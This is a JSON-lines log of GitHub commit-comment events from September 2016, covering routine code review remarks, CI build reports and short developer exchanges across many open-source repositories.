{"id":"4522688566","type":"CommitCommentEvent","actor":{"login":"hexmodr"},"repo":{"name":"CD2/preformisulations_co_uk"},"payload":{"comment":{"id":18915315,"position":5,"line":19,"path":"app/views/pages/home.html.haml","commit_id":"830bb4d6cc32ff2c67df223b0fe932cad90a686e","created_at":"2016-09-06T17:21:31Z","updated_at":"2016-09-06T17:21:31Z","body":":-1: "}},"created_at":"2016-09-06T17:21:31Z"}
{"id":"4522692307","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18915321,"position":null,"line":null,"path":null,"commit_id":"2b98f87d226945ad3400e960e268594a5db8ad2e","created_at":"2016-09-06T17:22:15Z","updated_at":"2016-09-06T17:22:15Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#NHkS8CegTe6kv5m1mPO5ww"}},"created_at":"2016-09-06T17:22:15Z"}
{"id":"4522697413","type":"CommitCommentEvent","actor":{"login":"GregoireH"},"repo":{"name":"lis-epfl/MAVRIC_Library"},"payload":{"comment":{"id":18915330,"position":null,"line":null,"path":null,"commit_id":"39f5e7291eeaa26dd5781c268c050689eb75a522","created_at":"2016-09-06T17:23:13Z","updated_at":"2016-09-06T17:23:13Z","body":"solve in commit 5feea2da22dd0da5a9c475323100a6c4fc3b6391"}},"created_at":"2016-09-06T17:23:13Z"}
{"id":"4522699869","type":"CommitCommentEvent","actor":{"login":"aldenml"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":18915339,"position":11,"line":11,"path":"common/src/main/java/com/frostwire/bittorrent/jlibtorrent/AlertMulticaster.java","commit_id":"9b821e0a31aa516f27bcfae9abf6e8a649c13a83","created_at":"2016-09-06T17:23:40Z","updated_at":"2016-09-06T17:23:40Z","body":"This is based in a better pattern to have a chain of listeners, is a lot safer in multithreading environments"}},"created_at":"2016-09-06T17:23:40Z"}
{"id":"4522704132","type":"CommitCommentEvent","actor":{"login":"crew102"},"repo":{"name":"daattali/advanced-shiny"},"payload":{"comment":{"id":18915347,"position":null,"line":null,"path":null,"commit_id":"c0c54e2eb1358e48cc52c0f9d699aeaf6cf78af1","created_at":"2016-09-06T17:24:28Z","updated_at":"2016-09-06T17:24:28Z","body":"Sorry, was going to get to this, just didn't have time last week. "}},"created_at":"2016-09-06T17:24:28Z"}
{"id":"4522709022","type":"CommitCommentEvent","actor":{"login":"bjfish"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":18915362,"position":9,"line":0,"path":"truffle/src/main/ruby/core/argf.rb","commit_id":"137f0f1c6be79981acaf8e1f15de6bcd8ded5f86","created_at":"2016-09-06T17:25:20Z","updated_at":"2016-09-06T17:25:20Z","body":"@eregon Fixed at faf97350e6ec78323c45b084335d90ed6369efa8, Thanks"}},"created_at":"2016-09-06T17:25:20Z"}
{"id":"4522709540","type":"CommitCommentEvent","actor":{"login":"eviltrout"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":18915363,"position":null,"line":null,"path":null,"commit_id":"c0b277d273536f6aab1df67d908ed5e306868b2a","created_at":"2016-09-06T17:25:23Z","updated_at":"2016-09-06T17:25:23Z","body":"The migration from ES5 -> ES6 took us about two years. We added that extension so that our transpiler would know which files contained ES6 code and which didn't need to be transpiled."}},"created_at":"2016-09-06T17:25:23Z"}
{"id":"4522711470","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18915370,"position":null,"line":null,"path":null,"commit_id":"95ddbbe3fcde87eb2285a3afbacd95be1ba51058","created_at":"2016-09-06T17:25:47Z","updated_at":"2016-09-06T17:25:47Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (RKStrand) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-95ddbbe3fcde87eb2285a3afbacd95be1ba51058-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-06T17:25:47Z"}
{"id":"4522712510","type":"CommitCommentEvent","actor":{"login":"ChilliHam"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":18915373,"position":null,"line":null,"path":null,"commit_id":"a3583da553e5e4bf5db9652350a7081d44d6d719","created_at":"2016-09-06T17:25:57Z","updated_at":"2016-09-06T17:25:57Z","body":"For the life of me, I've tried to get this to work and it's not showing up... I've kept up with the latest dev versions, Cleared my cache, tried to make sure everything was there... Nothing :C"}},"created_at":"2016-09-06T17:25:57Z"}
{"id":"4522717523","type":"CommitCommentEvent","actor":{"login":"athanatos"},"repo":{"name":"ceph/ceph"},"payload":{"comment":{"id":18915379,"position":67,"line":47,"path":"src/osd/ECTransaction.cc","commit_id":"058cc6b248516093c1b84d4ab4d1ed2abac27a61","created_at":"2016-09-06T17:26:54Z","updated_at":"2016-09-06T17:26:54Z","body":"This branch doesn't support actually support ec overwrites...that will be a later branch.  This one just reworks the data structures to expose more information to the backend."}},"created_at":"2016-09-06T17:26:54Z"}
{"id":"4522720118","type":"CommitCommentEvent","actor":{"login":"WilliamSWoodruff"},"repo":{"name":"BigRoomStudios/strange-forms"},"payload":{"comment":{"id":18915386,"position":162,"line":162,"path":"src/index.js","commit_id":"dd04b72aeecc387a55af4bb43e468f48eb5a234d","created_at":"2016-09-06T17:27:24Z","updated_at":"2016-09-06T17:27:24Z","body":"Do we want to handle checkbox values by default here too? They use 'checked', and I think it would ease pain when dealing with them. Could check the `type` attribute and return the e.target.checked val instead."}},"created_at":"2016-09-06T17:27:24Z"}
{"id":"4522723344","type":"CommitCommentEvent","actor":{"login":"pvillanueva01"},"repo":{"name":"subjectsplus/SubjectsPlus"},"payload":{"comment":{"id":18915397,"position":null,"line":null,"path":null,"commit_id":"468cb499ade4eddd8f1ca83e37afe59b53b7dbd0","created_at":"2016-09-06T17:28:00Z","updated_at":"2016-09-06T17:28:00Z","body":"We need to revert \"staging\" branch to this commit"}},"created_at":"2016-09-06T17:28:00Z"}
{"id":"4522726120","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18915403,"position":null,"line":null,"path":null,"commit_id":"8b5c30c8ae91b4b07a49a4645a0f182c0d67a3b7","created_at":"2016-09-06T17:28:33Z","updated_at":"2016-09-06T17:28:33Z","body":"The following doc(s) have been deployed to the [slashzerop](https://slashzerop-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/unsupported-modules-plugins](https://slashzerop-static-docs.pantheonsite.io/docs/unsupported-modules-plugins)\n"}},"created_at":"2016-09-06T17:28:33Z"}
{"id":"4522728868","type":"CommitCommentEvent","actor":{"login":"AFADoomer"},"repo":{"name":"Realm667/WolfenDoom"},"payload":{"comment":{"id":18915411,"position":null,"line":null,"path":null,"commit_id":"4993b9437a73a1c2c4b0bf89412149e4f3ecbfdc","created_at":"2016-09-06T17:29:07Z","updated_at":"2016-09-06T17:29:07Z","body":"I'll take a look tonight.\n\nOn Sep 6, 2016 12:07 PM, \"Ozymandias81\" <notifications@github.com> wrote:\n\n> Can someone get rid of this issue\n> <http://realm667.com/index.php/en/kunena/wolfendoom-blade-of-agony/330-c2m1-operaton-ausbruch?start=10#4657>\n> with SpotLight actor? Thanks.\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Realm667/WolfenDoom/commit/4993b9437a73a1c2c4b0bf89412149e4f3ecbfdc#commitcomment-18915143>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AP2VRLjq6lHcHWniSyf58To8khEutSgYks5qnZ27gaJpZM4J2ELw>\n> .\n>\n"}},"created_at":"2016-09-06T17:29:07Z"}
{"id":"4522738818","type":"CommitCommentEvent","actor":{"login":"JAZZ0155"},"repo":{"name":"JAZZ0155/myclasstest"},"payload":{"comment":{"id":18915430,"position":4,"line":5,"path":"test.java","commit_id":"1460fc3dc167fcaba6fc08a7d5419e0e3c5c917d","created_at":"2016-09-06T17:31:03Z","updated_at":"2016-09-06T17:31:03Z","body":"what's this?"}},"created_at":"2016-09-06T17:31:03Z"}
{"id":"4522739471","type":"CommitCommentEvent","actor":{"login":"JAZZ0155"},"repo":{"name":"JAZZ0155/myclasstest"},"payload":{"comment":{"id":18915431,"position":4,"line":5,"path":"test.java","commit_id":"1460fc3dc167fcaba6fc08a7d5419e0e3c5c917d","created_at":"2016-09-06T17:31:11Z","updated_at":"2016-09-06T17:31:11Z","body":"ddd "}},"created_at":"2016-09-06T17:31:11Z"}
{"id":"4522743959","type":"CommitCommentEvent","actor":{"login":"phillipwilhelm"},"repo":{"name":"gravityview/GravityView-Reimagined"},"payload":{"comment":{"id":18915440,"position":null,"line":null,"path":null,"commit_id":"926108554000b331dca5290b9d3c6e549f24c101","created_at":"2016-09-06T17:32:01Z","updated_at":"2016-09-06T17:32:01Z","body":"Thank you Zack"}},"created_at":"2016-09-06T17:32:01Z"}
{"id":"4522748998","type":"CommitCommentEvent","actor":{"login":"ciibot"},"repo":{"name":"linuxfoundation/cii-best-practices-badge"},"payload":{"comment":{"id":18915455,"position":19,"line":null,"path":"app/controllers/projects_controller.rb","commit_id":"9dabce047f9a0ab60988aa39ef6524c7e71c7426","created_at":"2016-09-06T17:32:53Z","updated_at":"2016-09-06T17:32:53Z","body":"Style/SymbolProc: Pass `&:id` as an argument to `map` instead of a block."}},"created_at":"2016-09-06T17:32:53Z"}
{"id":"4522751806","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18915461,"position":null,"line":null,"path":null,"commit_id":"95ddbbe3fcde87eb2285a3afbacd95be1ba51058","created_at":"2016-09-06T17:33:25Z","updated_at":"2016-09-06T17:33:25Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (RKStrand) - x86_64-MacOS-10.9-clang: OK (2325 of 2328 tests passed, 0 test warnings)\n\n * 3 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: ERR diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: Table big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: ZSZ big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-95ddbbe3fcde87eb2285a3afbacd95be1ba51058-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-95ddbbe3fcde87eb2285a3afbacd95be1ba51058-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.87%25-yellow.svg)</a> \n"}},"created_at":"2016-09-06T17:33:25Z"}
{"id":"4522756621","type":"CommitCommentEvent","actor":{"login":"devinivy"},"repo":{"name":"BigRoomStudios/strange-forms"},"payload":{"comment":{"id":18915470,"position":162,"line":162,"path":"src/index.js","commit_id":"dd04b72aeecc387a55af4bb43e468f48eb5a234d","created_at":"2016-09-06T17:34:20Z","updated_at":"2016-09-06T17:34:20Z","body":"Sounds reasonable to me!  This can be added as a non-breaking feature, so I don't think it gets in the way of publishing strange-forms.  Mind making an issue?"}},"created_at":"2016-09-06T17:34:20Z"}
{"id":"4522756702","type":"CommitCommentEvent","actor":{"login":"sompylasar"},"repo":{"name":"atom/apm"},"payload":{"comment":{"id":18915471,"position":null,"line":null,"path":null,"commit_id":"fa84f2693b22630e5125dcea10004300d00cdd75","created_at":"2016-09-06T17:34:21Z","updated_at":"2016-09-06T17:34:21Z","body":"Refs https://github.com/atom/atom/issues/12608\r\n\r\n_I wish the issue link was in the commit message_"}},"created_at":"2016-09-06T17:34:21Z"}
{"id":"4522759666","type":"CommitCommentEvent","actor":{"login":"davidsbond"},"repo":{"name":"davidsbond/distributr"},"payload":{"comment":{"id":18915476,"position":null,"line":null,"path":null,"commit_id":"2b956111757e5df7bb273b78269c551e93477e44","created_at":"2016-09-06T17:34:55Z","updated_at":"2016-09-06T17:34:55Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;bSCBwzWR&#x2F;15-create-encryption-decryption-methods-for-chunk-data\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Create encryption&#x2F;decryption methods for chunk data</a>"}},"created_at":"2016-09-06T17:34:55Z"}
{"id":"4522759989","type":"CommitCommentEvent","actor":{"login":"johnsnook"},"repo":{"name":"johnsnook/RPG-Go"},"payload":{"comment":{"id":18915477,"position":null,"line":null,"path":null,"commit_id":"b460ce31108245b116543cc04aa862ff04605b58","created_at":"2016-09-06T17:34:59Z","updated_at":"2016-09-06T17:34:59Z","body":"Tonight we're gonna party like it's 2008"}},"created_at":"2016-09-06T17:34:59Z"}
{"id":"4522761298","type":"CommitCommentEvent","actor":{"login":"kellyi"},"repo":{"name":"kellyi/model-my-watershed"},"payload":{"comment":{"id":18915482,"position":null,"line":null,"path":null,"commit_id":"ce8ca57ce49166529f561f59a4d4e39833552b6a","created_at":"2016-09-06T17:35:15Z","updated_at":"2016-09-06T17:35:15Z","body":"This change is specifically to handle a bug in versions prior to 1.5 described here:\r\n\r\nhttps://github.com/jazzband/django-debug-toolbar/issues/862"}},"created_at":"2016-09-06T17:35:15Z"}
{"id":"4522764443","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18915487,"position":null,"line":null,"path":null,"commit_id":"4899eab685b79e33e7a1fe00ca5a260d54e4ea7f","created_at":"2016-09-06T17:35:48Z","updated_at":"2016-09-06T17:35:48Z","body":"on second thought what i did may be disruptive for those who are\nuptodate with git and pulling regularly\n\nthis should fix any issue (revert to a previous commit and pull again)\n\ngit checkout testing\ngit reset --hard ceebc94f5ce098ef8afa5cc50f8a4eb0a167ea5e\ngit pull\n\ngit checkout rationalise\ngit reset --hard c19604299856f194bac3e5eea93ad15b1e425696\ngit pull\n"}},"created_at":"2016-09-06T17:35:48Z"}
{"id":"4522768448","type":"CommitCommentEvent","actor":{"login":"biplab-nag"},"repo":{"name":"tanvirstreame/musafir"},"payload":{"comment":{"id":18915496,"position":null,"line":null,"path":null,"commit_id":"0a4b1246a899ec01d6c51b9a4111c84143ab5d8a","created_at":"2016-09-06T17:36:32Z","updated_at":"2016-09-06T17:36:32Z","body":"!!!"}},"created_at":"2016-09-06T17:36:32Z"}
{"id":"4522773613","type":"CommitCommentEvent","actor":{"login":"WilliamSWoodruff"},"repo":{"name":"BigRoomStudios/strange-forms"},"payload":{"comment":{"id":18915506,"position":162,"line":162,"path":"src/index.js","commit_id":"dd04b72aeecc387a55af4bb43e468f48eb5a234d","created_at":"2016-09-06T17:37:30Z","updated_at":"2016-09-06T17:37:30Z","body":"Will do"}},"created_at":"2016-09-06T17:37:30Z"}
{"id":"4522787560","type":"CommitCommentEvent","actor":{"login":"KOLANICH"},"repo":{"name":"hashcat/hashcat"},"payload":{"comment":{"id":18915532,"position":null,"line":null,"path":null,"commit_id":"e4bf86dcbef100c57fb6532c10fbc9227f940693","created_at":"2016-09-06T17:40:04Z","updated_at":"2016-09-06T17:40:04Z","body":">Replace #pragma once with #ifndef #define #endif logic because #pragma once does not work cleanly on OSX\r\n\r\nYou shouldn't replace it. If you need header guards, just add them after #pragma to allow get benefit they provide. Compilers ignore pragmas they cannot process."}},"created_at":"2016-09-06T17:40:04Z"}
{"id":"4522788050","type":"CommitCommentEvent","actor":{"login":"briceburg"},"repo":{"name":"BlueAcornInc/hipchat-deploybot-addon"},"payload":{"comment":{"id":18915534,"position":6,"line":29,"path":"views/deploy-dialog.hbs","commit_id":"43a480bdd57ec63ddebc7905c6b6d302c19d78c1","created_at":"2016-09-06T17:40:11Z","updated_at":"2016-09-06T17:40:11Z","body":"@SamTay nice job on this. Do you have a link to docs?"}},"created_at":"2016-09-06T17:40:11Z"}
{"id":"4522794737","type":"CommitCommentEvent","actor":{"login":"sleupold"},"repo":{"name":"dnnsoftware/Dnn.Platform"},"payload":{"comment":{"id":18915549,"position":null,"line":null,"path":null,"commit_id":"b4cb575d80ed78c8d0939e64d5cc3ad66265907a","created_at":"2016-09-06T17:41:24Z","updated_at":"2016-09-06T17:41:24Z","body":"thanks!"}},"created_at":"2016-09-06T17:41:24Z"}
{"id":"4522796050","type":"CommitCommentEvent","actor":{"login":"jhamman"},"repo":{"name":"jhamman/xarray_paper"},"payload":{"comment":{"id":18915556,"position":38,"line":93,"path":"jors_xarray.tex","commit_id":"2494fc388d04252a0d96d98b54914ffcfbb652fd","created_at":"2016-09-06T17:41:39Z","updated_at":"2016-09-06T17:41:39Z","body":"I figured a reviewer might want some proof for this assertion which I don't think we have. Matlab also has unlabeled nd arrays, and I'm not sure how to compare their usages. I wont fight you if you change it back."}},"created_at":"2016-09-06T17:41:39Z"}
{"id":"4522797465","type":"CommitCommentEvent","actor":{"login":"SamTay"},"repo":{"name":"BlueAcornInc/hipchat-deploybot-addon"},"payload":{"comment":{"id":18915561,"position":6,"line":29,"path":"views/deploy-dialog.hbs","commit_id":"43a480bdd57ec63ddebc7905c6b6d302c19d78c1","created_at":"2016-09-06T17:41:56Z","updated_at":"2016-09-06T17:41:56Z","body":"https://developer.atlassian.com/hipchat/guide/dialog -- scroll to the bottom"}},"created_at":"2016-09-06T17:41:56Z"}
{"id":"4522800262","type":"CommitCommentEvent","actor":{"login":"bjornfor"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18915567,"position":null,"line":null,"path":null,"commit_id":"472ac50f5b10f4b3b4bfc03399dc2e34425f18b6","created_at":"2016-09-06T17:42:28Z","updated_at":"2016-09-06T17:42:28Z","body":"I think this commit broke eval:\r\n\r\n```\r\n$ nix-env -f . -qa '*' --meta --xml --drv-path --show-trace\r\nerror: while evaluating ‘callPackageWith’ at /home/bfo/nixpkgs2/lib/customisation.nix:93:35, called from /home/bfo/nixpkgs2/pkgs/top-level/all-packages.nix:5864:12:\r\nwhile evaluating ‘makeOverridable’ at /home/bfo/nixpkgs2/lib/customisation.nix:54:24, called from /home/bfo/nixpkgs2/lib/customisation.nix:97:8:\r\nwhile evaluating anonymous function at /home/bfo/nixpkgs2/pkgs/development/interpreters/octave/default.nix:1:1, called from /home/bfo/nixpkgs2/lib/customisation.nix:56:12:\r\nwhile evaluating ‘mkDerivation’ at /home/bfo/nixpkgs2/pkgs/stdenv/generic/default.nix:95:5, called from /home/bfo/nixpkgs2/pkgs/development/interpreters/octave/default.nix:20:1:\r\nwhile evaluating ‘checkValidity’ at /home/bfo/nixpkgs2/pkgs/stdenv/generic/default.nix:146:23, called from /home/bfo/nixpkgs2/pkgs/stdenv/generic/default.nix:171:22:\r\nvalue is a set while a list was expected, at /home/bfo/nixpkgs2/pkgs/stdenv/generic/default.nix:153:74\r\n```\r\n\r\nEval worked just a few commits ago, and the trace shows \"octave\"."}},"created_at":"2016-09-06T17:42:28Z"}
{"id":"4522802101","type":"CommitCommentEvent","actor":{"login":"THEMVFFINMAN"},"repo":{"name":"THEMVFFINMAN/Python-Games"},"payload":{"comment":{"id":18915570,"position":null,"line":null,"path":null,"commit_id":"5fe8aba99113c37fa32c7d51d4f7a04bc05a0aca","created_at":"2016-09-06T17:42:49Z","updated_at":"2016-09-06T17:42:49Z","body":"-I also removed all of the wall sprites and collisions with them and made the array of blocks 2 rows and columns larger and stored the outside rows and columns as a 1 indicating the outside wall. \r\n\r\n- At this point I don't even really need pygame, I have much more efficient collision detection and the like, but it is convenient for the images and screen. Until I find a better/simpler solution though for timing and screen and images, I'll use pygame"}},"created_at":"2016-09-06T17:42:49Z"}
{"id":"4522803534","type":"CommitCommentEvent","actor":{"login":"amellnik"},"repo":{"name":"angular/angular-cli"},"payload":{"comment":{"id":18915577,"position":null,"line":null,"path":null,"commit_id":"f286c1c798a1c9bbd46f8ea79282d3d2e76af30f","created_at":"2016-09-06T17:43:06Z","updated_at":"2016-09-06T17:43:06Z","body":"The instructions on the main doc page are a bit confusing at the moment -- they mention the webpack changes but the current install instructions can only be seen by following the link.  "}},"created_at":"2016-09-06T17:43:06Z"}
{"id":"4522803840","type":"CommitCommentEvent","actor":{"login":"shoyer"},"repo":{"name":"jhamman/xarray_paper"},"payload":{"comment":{"id":18915578,"position":38,"line":93,"path":"jors_xarray.tex","commit_id":"2494fc388d04252a0d96d98b54914ffcfbb652fd","created_at":"2016-09-06T17:43:10Z","updated_at":"2016-09-06T17:43:10Z","body":"> Matlab also has unlabeled nd arrays, and I'm not sure how to compare their usages.\r\n\r\nThis was exactly my point. Arrays are also the most common data structure in Matlab and Fortran."}},"created_at":"2016-09-06T17:43:10Z"}
{"id":"4522804883","type":"CommitCommentEvent","actor":{"login":"robske110"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18915579,"position":17,"line":2228,"path":"src/pocketmine/Player.php","commit_id":"3e81069213add7b6f8ae93bce7f7682d0765e591","created_at":"2016-09-06T17:43:20Z","updated_at":"2016-09-06T17:43:20Z","body":"why?"}},"created_at":"2016-09-06T17:43:20Z"}
{"id":"4522813293","type":"CommitCommentEvent","actor":{"login":"DrRamm"},"repo":{"name":"DrRamm/android_device_xiaomi_cancro"},"payload":{"comment":{"id":18915590,"position":null,"line":null,"path":null,"commit_id":"fcb796006fe78d37d009e6d254b62cbf3004ef80","created_at":"2016-09-06T17:44:56Z","updated_at":"2016-09-06T17:44:56Z","body":"nope, thats fixes for compiling. \r\n"}},"created_at":"2016-09-06T17:44:56Z"}
{"id":"4522826370","type":"CommitCommentEvent","actor":{"login":"rbuj"},"repo":{"name":"rbuj/review-translations"},"payload":{"comment":{"id":18915613,"position":null,"line":null,"path":null,"commit_id":"8223e447284ebdeb66da4fb89aaf4e050bd0d8d4","created_at":"2016-09-06T17:47:20Z","updated_at":"2016-09-06T17:47:20Z","body":"Ok. cc11c674ee2c3ffe92b6a76a201e896ed56b67ca"}},"created_at":"2016-09-06T17:47:20Z"}
{"id":"4522830189","type":"CommitCommentEvent","actor":{"login":"ThomasBrierley"},"repo":{"name":"Khan/KaTeX"},"payload":{"comment":{"id":18915620,"position":null,"line":null,"path":null,"commit_id":"c18d3ad6c4e3f44cb3d00852964cab092086b32f","created_at":"2016-09-06T17:48:04Z","updated_at":"2016-09-06T17:48:04Z","body":"I understand this change is to conform to the bower spec but for all practical purposes everyone just ends up having to stick the fonts back into the main files with bower overrides or use and older version. font-awesome users have the same problem.\r\n\r\nWould you consider putting the fonts back even though it doesn't conform to the spec? I don't know what reasoning bower are using for their spec but a bower.json without all the necessary main files isn't much use."}},"created_at":"2016-09-06T17:48:04Z"}
{"id":"4522838954","type":"CommitCommentEvent","actor":{"login":"jsteube"},"repo":{"name":"hashcat/hashcat"},"payload":{"comment":{"id":18915634,"position":null,"line":null,"path":null,"commit_id":"e4bf86dcbef100c57fb6532c10fbc9227f940693","created_at":"2016-09-06T17:49:43Z","updated_at":"2016-09-06T17:49:43Z","body":"It fails to compile on OSX with #pragma once"}},"created_at":"2016-09-06T17:49:43Z"}
{"id":"4522841833","type":"CommitCommentEvent","actor":{"login":"onepablo"},"repo":{"name":"sherpaservices/Jisc-Wordpress-Theme"},"payload":{"comment":{"id":18915640,"position":null,"line":null,"path":null,"commit_id":"0db08ef6c172432adf6765983c7a7b10c3e5e9d6","created_at":"2016-09-06T17:50:18Z","updated_at":"2016-09-06T17:50:18Z","body":"From style guide: \"To make it clear these are separate from the content of the page this pattern should only be used on the grey background, and not on the (white) body text area. \""}},"created_at":"2016-09-06T17:50:18Z"}
{"id":"4522846960","type":"CommitCommentEvent","actor":{"login":"ajs6f"},"repo":{"name":"fcrepo4-exts/fcrepo-java-client"},"payload":{"comment":{"id":18915652,"position":null,"line":null,"path":null,"commit_id":"926e8110b143ef5cf6d01230a632dd9983acca24","created_at":"2016-09-06T17:51:15Z","updated_at":"2016-09-06T17:51:15Z","body":"Thank you!"}},"created_at":"2016-09-06T17:51:15Z"}
{"id":"4522854415","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"Shnoulle/LimeSurvey-Shnoulle"},"payload":{"comment":{"id":18915674,"position":null,"line":null,"path":null,"commit_id":"2d65afb60d43a71475d598a2ac5cbc3bf205dc90","created_at":"2016-09-06T17:52:38Z","updated_at":"2016-09-06T17:52:38Z","body":"@PeterEmil : i use it without the inckuded template and all fix in template.css .\r\n\r\nWhy added margin-left: -30px; and margin-top: -10px; ? It's from awesome ?\r\n\r\nIf no : it broke template withn only bootstrap + awesome"}},"created_at":"2016-09-06T17:52:38Z"}
{"id":"4522857951","type":"CommitCommentEvent","actor":{"login":"gbri140"},"repo":{"name":"gbri140/hw1-gbri140"},"payload":{"comment":{"id":18915685,"position":17,"line":24,"path":"HW1.m","commit_id":"73ad5de63aeed2132fd12e3f5e8fca4b4027d8b0","created_at":"2016-09-06T17:53:18Z","updated_at":"2016-09-06T17:53:18Z","body":"z=8"}},"created_at":"2016-09-06T17:53:18Z"}
{"id":"4522858404","type":"CommitCommentEvent","actor":{"login":"jdalton"},"repo":{"name":"tus/tus.io"},"payload":{"comment":{"id":18915686,"position":7,"line":8,"path":"package.json","commit_id":"87dddef513228ae549382e533732e7ba762aba00","created_at":"2016-09-06T17:53:22Z","updated_at":"2016-09-06T17:53:22Z","body":"Can you explain the `{JEKYLL_ENV:-development}` bit?"}},"created_at":"2016-09-06T17:53:22Z"}
{"id":"4522866493","type":"CommitCommentEvent","actor":{"login":"as7bzx92dd"},"repo":{"name":"Lndqw12/5sept1"},"payload":{"comment":{"id":18915703,"position":null,"line":null,"path":null,"commit_id":"5bdc5d73b06d808ac060d56ec9cbd625ed7f8297","created_at":"2016-09-06T17:54:54Z","updated_at":"2016-09-06T17:54:54Z","body":"OK"}},"created_at":"2016-09-06T17:54:54Z"}
{"id":"4522867226","type":"CommitCommentEvent","actor":{"login":"loisch"},"repo":{"name":"factisresearch/persistent"},"payload":{"comment":{"id":18915707,"position":null,"line":null,"path":null,"commit_id":"a2c2579aaa2adb0613aec5664705e83779d54452","created_at":"2016-09-06T17:55:02Z","updated_at":"2016-09-06T17:55:02Z","body":"Moin Tim,\n\nklar!\n\nVg David\n\nOn Tue, 6 Sep 2016 at 19:22 Tim Baumann <notifications@github.com> wrote:\n\n> Können wir das hier als Pull-Request den Persistent-Leuten geben? Dann\n> müssen wir diesen Branch hier nicht maintainen.\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/factisresearch/persistent/commit/a2c2579aaa2adb0613aec5664705e83779d54452#commitcomment-18915144>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABCWYSnZSNYVxrkZycUHX4kt6kmWi9DUks5qnZ27gaJpZM4J2EL3>\n> .\n>\n"}},"created_at":"2016-09-06T17:55:02Z"}
{"id":"4522869964","type":"CommitCommentEvent","actor":{"login":"williamcroberts"},"repo":{"name":"werwurm/selinux"},"payload":{"comment":{"id":18915713,"position":null,"line":null,"path":null,"commit_id":"c0ca466f06f6b53cdf7617e06df2e93672d4d109","created_at":"2016-09-06T17:55:34Z","updated_at":"2016-09-06T17:55:34Z","body":"Im ok with this, I don't see anything they would complain about offhand. Go ahead and send this with send-email to:\r\n--to selinux@tycho.nsa.gov --to seandroid-list@tycho.nsa.gov --to sds@tycho.nsa.gov --to jwcart2@tycho.nsa.gov\r\n\r\nIll ack on the patches as well.\r\n"}},"created_at":"2016-09-06T17:55:34Z"}
{"id":"4522874268","type":"CommitCommentEvent","actor":{"login":"capone3691"},"repo":{"name":"Particular/NServiceBus"},"payload":{"comment":{"id":18915720,"position":null,"line":null,"path":null,"commit_id":"411d1b32cdf126e0ac61e783129085f783c9b3c7","created_at":"2016-09-06T17:56:21Z","updated_at":"2016-09-06T17:56:21Z","body":"Warn"}},"created_at":"2016-09-06T17:56:21Z"}
{"id":"4522876382","type":"CommitCommentEvent","actor":{"login":"bjornfor"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18915723,"position":null,"line":null,"path":null,"commit_id":"d9c76736cc6e3b8e9a7dc06bf824d06a22a6a699","created_at":"2016-09-06T17:56:45Z","updated_at":"2016-09-06T17:56:45Z","body":"Ah, was it the 'rec' keyword that caused the conflict? I couldn't understand why it failed. Thanks for the rapid fix."}},"created_at":"2016-09-06T17:56:45Z"}
{"id":"4522876972","type":"CommitCommentEvent","actor":{"login":"andrewsmartin"},"repo":{"name":"spotify/scio"},"payload":{"comment":{"id":18915724,"position":100,"line":100,"path":"scio-test/src/it/scala/com/spotify/scio/bigquery/BigQueryPipelineIT.scala","commit_id":"d068055599820b27cb791b9485711e7392d3dafa","created_at":"2016-09-06T17:56:51Z","updated_at":"2016-09-06T17:56:51Z","body":"Minor, but new line here?"}},"created_at":"2016-09-06T17:56:51Z"}
{"id":"4522879128","type":"CommitCommentEvent","actor":{"login":"IAMtheIAM"},"repo":{"name":"AngularClass/angular2-webpack-starter"},"payload":{"comment":{"id":18915729,"position":null,"line":null,"path":null,"commit_id":"65e04a5439bfc6ab124a00bcdea78c57443a10d5","created_at":"2016-09-06T17:57:15Z","updated_at":"2016-09-06T17:57:15Z","body":"What was the point of removing support for webpack-dashboard in https://github.com/AngularClass/angular2-webpack-starter/commit/27842808a6b0e371b4a4a841e77a88a06931688e and then adding it back here?"}},"created_at":"2016-09-06T17:57:15Z"}
